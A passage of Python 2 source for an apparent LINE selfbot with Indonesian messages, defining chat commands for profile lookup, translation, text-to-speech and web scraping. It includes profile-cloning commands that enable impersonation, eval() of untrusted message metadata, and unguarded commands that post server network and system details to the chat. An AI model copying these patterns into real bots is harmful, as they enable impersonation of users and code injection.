h.statusMessage) elif msg.text in ["Mypict"]: h = cl.getContact(mid) cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Myvid"]: h = cl.getContact(mid) cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Urlpict"]: h = cl.getContact(mid) cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Mycover"]: h = cl.getContact(mid) cu = cl.channel.getCover(mid) path = str(cu) cl.sendImageWithURL(msg.to, path) elif msg.text in ["Urlcover"]: h = cl.getContact(mid) cu = cl.channel.getCover(mid) path = str(cu) cl.sendText(msg.to, path) elif "Getmid @" in msg.text: _name = msg.text.replace("Getmid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(msg.to, g.mid) else: pass elif "Getinfo" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = 
key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu)) except: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu)) elif "Getbio" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage) except: cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage) elif "Getname" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName) except: cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName) elif "Getprofile" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) except: pass elif "Getcontact" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] mmid = cl.getContact(key1) msg.contentType = 13 msg.contentMetadata = {"mid": key1} cl.sendMessage(msg) elif "Getpict @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getpict @","") _nametarget = 
_name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendImageWithURL(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Getvid @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getvid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendVideoWithURL(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Picturl @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Picturl @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Getcover @" in msg.text: print "[Command]cover executing" _name = msg.text.replace("Getcover @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendImageWithURL(msg.to, path) except Exception as e: raise e print "[Command]cover executed" elif 
"Coverurl @" in msg.text: print "[Command]cover executing" _name = msg.text.replace("Coverurl @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendText(msg.to, path) except Exception as e: raise e print "[Command]cover executed" elif "Getgrup image" in msg.text: group = cl.getGroup(msg.to) path = "http://dl.profile.line-cdn.net/" + group.pictureStatus cl.sendImageWithURL(msg.to,path) elif "Urlgrup image" in msg.text: group = cl.getGroup(msg.to) path = "http://dl.profile.line-cdn.net/" + group.pictureStatus cl.sendText(msg.to,path) elif "Mycopy @" in msg.text: print "[COPY] Ok" _name = msg.text.replace("Mycopy @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to, "Not Found...") else: for target in targets: try: cl.CloneContactProfile(target) cl.sendText(msg.to, "Copied.") except Exception as e: print e elif msg.text in ["Mybackup","mybackup"]: try: cl.updateDisplayPicture(backup.pictureStatus) cl.updateProfile(backup) cl.sendText(msg.to, "Refreshed.") except Exception as e: cl.sendText(msg.to, str(e)) #==============================================================================# elif "Fancytext: " in msg.text: txt = msg.text.replace("Fancytext: ", "") cl.kedapkedip(msg.to,txt) print "[Command] Kedapkedip" elif "Translate-id " in msg.text: isi = msg.text.replace("Tr-id ","") translator = Translator() hasil = translator.translate(isi, dest='id') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-en " in msg.text: isi = msg.text.replace("Tr-en ","") translator = Translator() hasil = translator.translate(isi, dest='en') A = hasil.text 
A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-ar" in msg.text: isi = msg.text.replace("Tr-ar ","") translator = Translator() hasil = translator.translate(isi, dest='ar') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-jp" in msg.text: isi = msg.text.replace("Tr-jp ","") translator = Translator() hasil = translator.translate(isi, dest='ja') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-ko" in msg.text: isi = msg.text.replace("Tr-ko ","") translator = Translator() hasil = translator.translate(isi, dest='ko') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Id@en" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'en' kata = msg.text.replace("Id@en ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**") elif "En@id" in msg.text: bahasa_awal = 'en' bahasa_tujuan = 'id' kata = msg.text.replace("En@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**") elif "Id@jp" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ja' kata = msg.text.replace("Id@jp ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", 
"+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**") elif "Jp@id" in msg.text: bahasa_awal = 'ja' bahasa_tujuan = 'id' kata = msg.text.replace("Jp@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@th" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'th' kata = msg.text.replace("Id@th ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----") elif "Th@id" in msg.text: bahasa_awal = 'th' bahasa_tujuan = 'id' kata = msg.text.replace("Th@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM TH----\n" + "" + 
kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@jp" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ja' kata = msg.text.replace("Id@jp ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----") elif "Id@ar" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ar' kata = msg.text.replace("Id@ar ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----") elif "Ar@id" in msg.text: bahasa_awal = 'ar' bahasa_tujuan = 'id' kata = msg.text.replace("Ar@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@ko" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ko' kata = msg.text.replace("Id@ko ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, 
bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----") elif "Ko@id" in msg.text: bahasa_awal = 'ko' bahasa_tujuan = 'id' kata = msg.text.replace("Ko@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif msg.text.lower() == 'welcome': ginfo = cl.getGroup(msg.to) cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name)) jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name)) cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName ) tts = gTTS(text=jawaban1, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif "Say-id " in msg.text: say = msg.text.replace("Say-id ","") lang = 'id' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-en " in msg.text: say = msg.text.replace("Say-en ","") lang = 'en' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-jp " in msg.text: say = msg.text.replace("Say-jp ","") lang = 'ja' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-ar " in msg.text: say = msg.text.replace("Say-ar ","") lang = 'ar' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-ko " in 
msg.text: say = msg.text.replace("Say-ko ","") lang = 'ko' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Kapan " in msg.text: tanya = msg.text.replace("Kapan ","") jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi") jawaban = random.choice(jawab) tts = gTTS(text=jawaban, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif "Apakah " in msg.text: tanya = msg.text.replace("Apakah ","") jawab = ("Ya","Tidak","Mungkin","Bisa jadi") jawaban = random.choice(jawab) tts = gTTS(text=jawaban, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif 'Youtubemp4 ' in msg.text: try: textToSearch = (msg.text).replace('Youtubemp4 ', "").strip() query = urllib.quote(textToSearch) url = "https://www.youtube.com/results?search_query=" + query response = urllib2.urlopen(url) html = response.read() soup = BeautifulSoup(html, "html.parser") results = soup.find(attrs={'class': 'yt-uix-tile-link'}) ght = ('https://www.youtube.com' + results['href']) cl.sendVideoWithURL(msg.to, ght) except: cl.sendText(msg.to, "Could not find it") elif "ytsearch " in msg.text: query = msg.text.replace("ytsearch ","") with requests.session() as s: s.headers['user-agent'] = 'Mozilla/5.0' url = 'http://www.youtube.com/results' params = {'search_query': query} r = s.get(url, params=params) soup = BeautifulSoup(r.content, 'html5lib') hasil = "" for a in soup.select('.yt-lockup-title > a[title]'): if '&list=' not in a['href']: hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n')) cl.sendText(msg.to,hasil) print '[Command] Youtube Search' elif "Lirik " in msg.text: try: songname = msg.text.lower().replace("Lirik ","") params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' 
+ urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'Lyric Lagu (' hasil += song[0] hasil += ')\n\n' hasil += song[5] cl.sendText(msg.to, hasil) except Exception as wak: cl.sendText(msg.to, str(wak)) elif "Wikipedia " in msg.text: try: wiki = msg.text.lower().replace("Wikipedia ","") wikipedia.set_lang("id") pesan="Title (" pesan+=wikipedia.page(wiki).title pesan+=")\n\n" pesan+=wikipedia.summary(wiki, sentences=1) pesan+="\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except: try: pesan="Over Text Limit! Please Click link\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except Exception as e: cl.sendText(msg.to, str(e)) elif "Music " in msg.text: try: songname = msg.text.lower().replace("Music ","") params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'This is Your Music\n' hasil += 'Judul : ' + song[0] hasil += '\nDurasi : ' + song[1] hasil += '\nLink Download : ' + song[4] cl.sendText(msg.to, hasil) cl.sendText(msg.to, "Please Wait for audio...") cl.sendAudioWithURL(msg.to, song[4]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif "Image " in msg.text: search = msg.text.replace("Image ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass elif "Profileig " in msg.text: try: instagram = msg.text.replace("Profileig ","") response = requests.get("https://www.instagram.com/"+instagram+"?__a=1") data = response.json() namaIG = str(data['user']['full_name']) bioIG = str(data['user']['biography']) mediaIG = str(data['user']['media']['count']) verifIG = str(data['user']['is_verified']) usernameIG = 
str(data['user']['username']) followerIG = str(data['user']['followed_by']['count']) profileIG = data['user']['profile_pic_url_hd'] privateIG = str(data['user']['is_private']) followIG = str(data['user']['follows']['count']) link = "LinkNya: " + "https://www.instagram.com/" + instagram text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollowerNya : "+followerIG+"\nFollowingNya : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link cl.sendText(msg.to, str(text)) except Exception as e: cl.sendText(msg.to, str(e)) elif 'instagram ' in msg.text.lower(): try: instagram = msg.text.lower().replace("instagram ","") html = requests.get('https://www.instagram.com/' + instagram + '/?') soup = BeautifulSoup(html.text, 'html5lib') data = soup.find_all('meta', attrs={'property':'og:description'}) text = data[0].get('content').split() data1 = soup.find_all('meta', attrs={'property':'og:image'}) text1 = data1[0].get('content').split() user = "Name: " + text[-2] + "\n" user1 = "Username: " + text[-1] + "\n" followers = "Followers: " + text[0] + "\n" following = "Following: " + text[2] + "\n" post = "Post: " + text[4] + "\n" link = "Link: " + "https://www.instagram.com/" + instagram detail = "********************\n" details = "\n********************=" cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details) cl.sendImageWithURL(msg.to, text1[0]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif "Checkdate " in msg.text: tanggal = msg.text.replace("Checkdate ","") r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal) data=r.text data=json.loads(data) lahir = data["data"]["lahir"] usia = data["data"]["usia"] ultah = data["data"]["ultah"] zodiak = data["data"]["zodiak"] cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : 
"+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============") elif "Zodiak " in msg.text: tanggal = msg.text.replace("Zodiak ","") r=requests.get('https://script.google.com/ macros/exec?service=AKfycbw7gKzP-WYV 2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal) data=r.text data=json.loads(data) lahir = data["data"]["lahir"] usia = data["data"]["usia"] ultah = data["data"]["ultah"] zodiak = data["data"]["zodiak"] cl.sendText(msg.to,"Tanggal Lahir: "+lahir+"\n\nUsia:"+usia+"\n\nUltah: "+ultah+"\n\nZodiak: "+zodiak) elif msg.text in ["Kalender","Time","Waktu"]: timeNow = datetime.now() timeHours = datetime.strftime(timeNow,"(%H:%M)") day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"] hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"] bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] inihari = datetime.today() hr = inihari.strftime('%A') bln = inihari.strftime('%m') for i in range(len(day)): if hr == day[i]: hasil = hari[i] for k in range(0, len(bulan)): if bln == str(k): blan = bulan[k-1] rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]" cl.sendText(msg.to, rst) #==============================================================================# elif msg.text.lower() == 'ifconfig': botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===") elif msg.text.lower() == 'system': botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===") elif msg.text.lower() == 'kernel': botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===") 
elif msg.text.lower() == 'cpu': botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===") elif "Restart" in msg.text: print "[Command]Restart" try: cl.sendText(msg.to,"Restarting...") cl.sendText(msg.to,"Restart Success") restart_program() except: cl.sendText(msg.to,"Please wait") restart_program() pass elif "Turn off" in msg.text: try: import sys sys.exit() except: pass elif msg.text.lower() == 'runtime': eltime = time.time() - mulai van = "Bot has been active "+waktu(eltime) cl.sendText(msg.to,van) #================================ PUY SCRIPT STARTED ==============================================# elif "google " in msg.text: a = msg.text.replace("google ","") b = urllib.quote(a) cl.sendText(msg.to,"Sedang Mencari om...") cl.sendText(msg.to, "https://www.google.com/" + b) cl.sendText(msg.to,"Ketemu om ^") elif cms(msg.text,["/creator","Creator"]): msg.contentType = 13 msg.contentMetadata = {'mid': "ub14f769cdf42d8c8a618ebe91ac2c8c7"} cl.sendMessage(msg) #elif msg.text in ["puy"]: #cl.sendText(msg.to,"Puy here") # cl.sendText(msg.to,"Puy here") # kk.sendText(msg.to,"Puy here") # cl.sendText(msg.to,"Hadir semua puy!") elif msg.text in ["Masuk","...","Join kuy"]: #Panggil Semua Bot if msg.from_ in admin: G = cl.getGroup(msg.to) ginfo = cl.getGroup(msg.to) G.preventJoinByTicket = False cl.updateGroup(G) invsend = 0 Ticket = cl.reissueGroupTicket(msg.to) ki.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.01) kk.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.01) G = cl.getGroup(msg.to) ginfo = cl.getGroup(msg.to) G.preventJoinByTicket = True cl.updateGroup(G) print "Semua Sudah Lengkap" elif msg.text in ["Puy join"]: if msg.from_ in admin: x = ki.getGroup(msg.to) x.preventJoinByTicket = False ki.updateGroup(x) invsend = 0 Ti = ki.reissueGroupTicket(msg.to) cl.acceptGroupInvitationByTicket(msg.to,Ti) G = ki.getGroup(msg.to) G.preventJoinByTicket = True 
ki.updateGroup(G) Ticket = ki.reissueGroupTicket(msg.to) elif "Clone " in msg.text: copy0 = msg.text.replace("Clone ","") copy1 = copy0.lstrip() copy2 = copy1.replace("@","") copy3 = copy2.rstrip() _name = copy3 group = cl.getGroup(msg.to) for contact in group.members: cname = cl.getContact(contact.mid).displayName if cname == _name: cl.CloneContactProfile(contact.mid) cl.sendText(msg.to, "Berhasil puy") else: pass elif "friendpp: " in msg.text: if msg.from_ in admin: suf = msg.text.replace('friendpp: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName gna = cl.getContact(i) if h == suf: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif "Checkmid: " in msg.text: saya = msg.text.replace("Checkmid: ","") msg.contentType = 13 msg.contentMetadata = {"mid":saya} cl.sendMessage(msg) contact = cl.getContact(saya) cu = cl.channel.getCover(saya) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) except: pass elif "Checkid: " in msg.text: saya = msg.text.replace("Checkid: ","") gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).id group = cl.getGroup(i) if h == saya: try: creator = group.creator.mid msg.contentType = 13 msg.contentMetadata = {'mid': creator} md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " 
Orang" cl.sendText(msg.to,md) cl.sendMessage(msg) cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus) except: creator = "Error" elif msg.text in ["Friendlist"]: contactlist = cl.getAllContactIds() kontak = cl.getContacts(contactlist) num=1 msgs="═════════List Friend═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Memlist"]: kontak = cl.getGroup(msg.to) group = kontak.members num=1 msgs="═════════List Member═════════-" for ids in group: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group) cl.sendText(msg.to, msgs) elif "Friendinfo: " in msg.text: saya = msg.text.replace('Friendinfo: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName contact = cl.getContact(i) cu = cl.channel.getCover(i) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus if h == saya: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) elif "Friendpict: " in msg.text: saya = msg.text.replace('Friendpict: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName gna = cl.getContact(i) if h == saya: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif msg.text in ["Friendlistmid"]: gruplist = cl.getAllContactIds() kontak = cl.getContacts(gruplist) num=1 msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.mid) num=(num+1) msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Blocklist"]: blockedlist = 
